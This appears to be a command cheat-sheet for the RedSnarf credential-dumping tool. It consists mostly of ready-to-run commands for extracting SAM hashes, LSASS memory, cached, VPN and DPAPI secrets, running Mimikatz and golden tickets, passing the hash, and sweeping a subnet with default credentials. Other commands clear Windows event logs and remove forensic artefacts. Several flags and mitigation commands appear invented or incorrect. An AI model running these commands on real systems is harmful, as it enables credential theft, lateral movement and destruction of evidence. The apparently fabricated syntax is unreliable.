RedSnarf

Overview

RedSnarf is a specialized red team tool for extracting credentials and sensitive information from Windows systems. It provides methods to dump cached credentials, extract from SAM databases, harvest from memory, and extract from various Windows storage locations. Used by authorized security professionals for authorized penetration testing, red team engagements, and security assessments. Requires administrative privileges on target systems.

Installation

Prerequisites

# Python 3.6+
python3 --version

# Required libraries
sudo apt-get install python3-pip python3-dev

# On Windows: Install Visual C++ build tools
# Download: https://visualstudio.microsoft.com/visual-cpp-build-tools/

From GitHub

git clone https://github.com/nccgroup/redsnarf.git
cd redsnarf
pip3 install -r requirements.txt

Kali Linux

sudo apt-get install redsnarf

Verify Installation

python3 redsnarf.py --help
redsnarf --version
which redsnarf

Basic Syntax

python3 redsnarf.py [options] <target>
redsnarf --help
redsnarf --version
redsnarf -h <target> -u <username> -p <password> -d <domain>

Essential Commands

Command	Purpose
-h <target>	Specify target host
-u <username>	Username for authentication
-p <password>	Password for authentication
-d <domain>	Domain name
-L	Local system extraction
-R	Remote system extraction
--sam	Extract SAM database
--lsass	Dump LSASS memory
--registry	Extract from registry
--mimikatz	Run Mimikatz commands
--hash	Extract password hashes
--cached	Dump cached credentials
-o <output>	Output file
-v	Verbose output

Credential Extraction Methods

Local SAM Extraction

# Extract local SAM database (requires SYSTEM privileges)
python3 redsnarf.py -L --sam --output local_hashes.txt

LSASS Memory Dump

# Dump LSASS process memory for credential extraction
python3 redsnarf.py -L --lsass --output lsass_dump.txt

Cached Credentials

# Extract cached domain credentials from registry
python3 redsnarf.py -L --cached --output cached_creds.txt

Remote SAM Extraction

# Extract SAM from remote host
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Administrator \
  -p MyPassword123 \
  -d DOMAIN \
  --sam --output remote_hashes.txt

Multiple Credential Sources

# Extract from all available sources
python3 redsnarf.py \
  -L \
  --sam \
  --lsass \
  --cached \
  --registry \
  --output all_creds.txt

Registry Extraction

Extract Credentials from Registry

# Access Windows registry for stored credentials
python3 redsnarf.py \
  -L \
  --registry \
  --hive SAM \
  --output registry_creds.txt

Remote Registry Access

# Extract from remote registry via RDP/SMB
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --registry \
  --remote

AutoLogon Credentials

# Extract stored AutoLogon credentials
python3 redsnarf.py \
  -L \
  --registry \
  --key "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon" \
  --output autologon.txt

VPN Credentials

# Extract stored VPN credentials from registry
python3 redsnarf.py -L --registry --vpn --output vpn_creds.txt

Hash Extraction

Extract Password Hashes

# Dump all password hashes from SAM
python3 redsnarf.py -L --hash --output hashes.txt

NTLM Hash Format

# Extract NTLM hashes for cracking
python3 redsnarf.py \
  -L \
  --hash \
  --format ntlm \
  --output ntlm_hashes.txt

LM Hash Extraction

# Extract legacy LM hashes (if available)
python3 redsnarf.py -L --hash --format lm --output lm_hashes.txt

Hash Analysis

# Extract and analyze hashes
python3 redsnarf.py \
  -L \
  --hash \
  --analyze \
  --output hash_analysis.txt

Mimikatz Integration

Run Mimikatz Commands

# Execute Mimikatz commands through redsnarf
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --mimikatz \
  --command "sekurlsa::logonpasswords" \
  --output mimikatz_output.txt

Credential Dumping via Mimikatz

# Dump all credentials using Mimikatz
python3 redsnarf.py \
  -L \
  --mimikatz \
  --full \
  --output credentials_full.txt

Golden Ticket Generation

# Use Mimikatz to create golden ticket
python3 redsnarf.py \
  --mimikatz \
  --command "kerberos::golden /user:Administrator /domain:DOMAIN.COM /sid:S-1-5-21-..." \
  --output golden_ticket.txt

Remote Exploitation

Remote Credential Extraction

# Extract credentials from remote Windows system
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u domain\administrator \
  -p MyPassword123 \
  --remote \
  --lsass \
  --output remote_creds.txt

SMB-Based Extraction

# Use SMB protocol for credential extraction
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --smb \
  --remote \
  --sam

WMI-Based Extraction

# Extract via WMI (Windows Management Instrumentation)
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --wmi \
  --command "Get-Process lsass"

RDP Session Access

# Extract credentials from RDP sessions
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --rdp \
  --extract-sessions \
  --output rdp_sessions.txt

Privilege Escalation Chains

Check Privileges

# Check current privilege level
python3 redsnarf.py -L --check-privs

Token Impersonation

# Leverage token impersonation for escalation
python3 redsnarf.py \
  -L \
  --impersonate \
  --target SYSTEM \
  --output impersonation_result.txt

Service Account Extraction

# Extract service account credentials
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --service-accounts \
  --output service_creds.txt

Group Policy Preferences

# Extract from Group Policy Preferences (GPP)
python3 redsnarf.py \
  -L \
  --gpp \
  --output gpp_creds.txt

Batch Operations

Target Multiple Hosts

# Create target list
cat targets.txt
# 192.168.1.100 Administrator Pass123 DOMAIN
# 192.168.1.101 Admin Pass456 DOMAIN
# 192.168.1.102 User789 Pass789 DOMAIN

# Process all targets
while read host user pass domain; do
  python3 redsnarf.py -h "$host" -u "$user" -p "$pass" -d "$domain" \
    --sam --output "${host}_hashes.txt"
done < targets.txt

Automated Network Harvesting

#!/bin/bash
# Harvest credentials from network
for ip in 192.168.1.{50..100}; do
  timeout 5 bash -c "python3 redsnarf.py -h $ip -u Administrator -p password --sam" &
done
wait

Credential Aggregation

#!/bin/bash
# Combine all extracted credentials
cat *.txt | grep -E "admin|root|pass" > all_creds_combined.txt
sort all_creds_combined.txt | uniq > unique_creds.txt

Output Analysis

Parse Extracted Credentials

# Extract usernames and hashes
python3 redsnarf.py -L --sam --output hashes.txt
cat hashes.txt | grep -oE "^[^:]+:[^:]+:[A-F0-9]{32}:[A-F0-9]{32}$"

Hash Format Conversion

# Convert hashes for use with Hashcat
python3 redsnarf.py -L --hash --output hashes.txt
cat hashes.txt | awk -F: '{print $4}' > hashcat_ntlm.txt

Credential Deduplication

# Remove duplicate credentials
sort -u all_credentials.txt > unique_credentials.txt

Plaintext Credential Search

# Search for plaintext credentials
grep -iE "password|pass|pwd|creds" extracted_output.txt

Advanced Extraction

Memory Parsing

# Dump and parse process memory
python3 redsnarf.py \
  -L \
  --memory-dump \
  --process lsass \
  --output lsass_memory.bin

# Parse the dump
python3 redsnarf.py --parse-dump lsass_memory.bin --output parsed.txt

Kerberos Ticket Extraction

# Extract Kerberos tickets from memory
python3 redsnarf.py \
  -L \
  --kerberos \
  --extract-tickets \
  --output tickets.txt

DPAPI Data Recovery

# Extract DPAPI-encrypted credentials
python3 redsnarf.py \
  -L \
  --dpapi \
  --decrypt \
  --output dpapi_decrypted.txt

Credential Manager Extraction

# Extract Windows Credential Manager credentials
python3 redsnarf.py \
  -L \
  --credential-manager \
  --output credential_manager.txt

Post-Exploitation

Lateral Movement Preparation

# Extract credentials for lateral movement
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  --extract-all \
  --lateral-movement-prep \
  --output lateral_creds.txt

Persistence Mechanism Setup

# Extract data for establishing persistence
python3 redsnarf.py \
  -L \
  --persistence \
  --auto-logon \
  --scheduled-task \
  --output persistence_creds.txt

Domain Enumeration

# Extract domain information
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u Admin \
  -p Pass123 \
  -d DOMAIN \
  --domain-enum \
  --output domain_info.txt

Operational Security

Evasion Techniques

# Minimize detection risk
python3 redsnarf.py \
  -L \
  --quiet \
  --no-logging \
  --minimal-output \
  --output creds.txt

Log Cleanup

# Clear event logs post-extraction
python3 redsnarf.py \
  -L \
  --cleanup \
  --clear-logs \
  --log-type Security,System

Anti-Forensics

# Minimize forensic artifacts
python3 redsnarf.py \
  -L \
  --anti-forensics \
  --clear-timestamps \
  --remove-artifacts

Troubleshooting

Access Denied

# Requires SYSTEM privileges
sudo python3 redsnarf.py -L --sam

# Or use credentials with sufficient privileges
python3 redsnarf.py \
  -h 192.168.1.100 \
  -u DOMAIN\Administrator \
  -p MyPassword123 \
  --sam

Remote Connection Issues

# Verify network connectivity
ping 192.168.1.100

# Test SMB access
smbclient -L 192.168.1.100 -U Administrator%Password

# Check firewall
netstat -an | grep ESTABLISHED

Mimikatz Integration Failed

# Verify Mimikatz availability
which mimikatz

# Check Python dependencies
pip3 list | grep -i mimic

# Reinstall requirements
pip3 install -r requirements.txt --upgrade

Credential Storage

Secure Output

# Encrypt output file
python3 redsnarf.py -L --sam --output creds.txt
gpg --symmetric --armor creds.txt

Credential Database

# Store in structured format
python3 redsnarf.py \
  -L \
  --sam \
  --database credentials.db \
  --format sqlite

Real-World Scenarios

Internal Network Assessment

# Phase 1: Local system extraction
python3 redsnarf.py -L --extract-all --output local_system.txt

# Phase 2: Remote extraction
for host in $(cat internal_hosts.txt); do
  python3 redsnarf.py -h "$host" -u Admin -p Pass123 \
    --remote --lsass --output "${host}.txt"
done

# Phase 3: Credential aggregation
cat *.txt | grep -oE '[A-F0-9]{32}:[A-F0-9]{32}' > all_hashes.txt

Domain Compromise

# Extract domain credentials
python3 redsnarf.py \
  -h domain-controller \
  -u Administrator \
  -p DomainPassword \
  -d DOMAIN \
  --sam --lsass --cached \
  --output domain_dump.txt

Privilege Escalation Chain

# Extract local admin
python3 redsnarf.py -L --hash --output local_hashes.txt

# Use hash to access remote system
python3 redsnarf.py \
  -h 192.168.1.101 \
  -u Administrator \
  -p <NTLM_HASH> \
  --pass-the-hash \
  --extract-all

Best Practices

1. Obtain Authorization - Only use on authorized systems with written permission
2. Enable Logging - Log all operations for documentation and legal requirements
3. Minimize Exposure - Extract credentials quickly and securely
4. Secure Credentials - Encrypt and protect extracted credential data
5. Documentation - Document all systems accessed and credentials extracted
6. Clean Up - Remove tools and clear logs after authorized assessment
7. Chain Custody - Maintain evidence chain for legal proceedings
8. Incident Response - Have remediation plan for extracted credentials

Mitigation

Prevent SAM Extraction

# Enable additional access controls
net user Administrator /active:no

# Require strong passwords
net accounts /minpwlen:14 /complexity:on

LSASS Protection

# Enable LSASS protection (Windows 10+)
Set-ProcessMitigation -PolicyName "lsass.exe" -Enable ParentImageLoadAudit

Credential Guard

# Enable Windows Defender Credential Guard
New-ItemProperty -Path "HKLM:\System\CurrentControlSet\Control\Lsa" `
  -Name "LsaCfgFlags" -Value 1 -PropertyType DWORD

Additional Resources

• RedSnarf GitHub: https://github.com/nccgroup/redsnarf
• Windows Credentials: https://docs.microsoft.com/en-us/windows/security/
• Hash Cracking: https://hashcat.net/
• Credential Dumping: https://attack.mitre.org/techniques/T1003/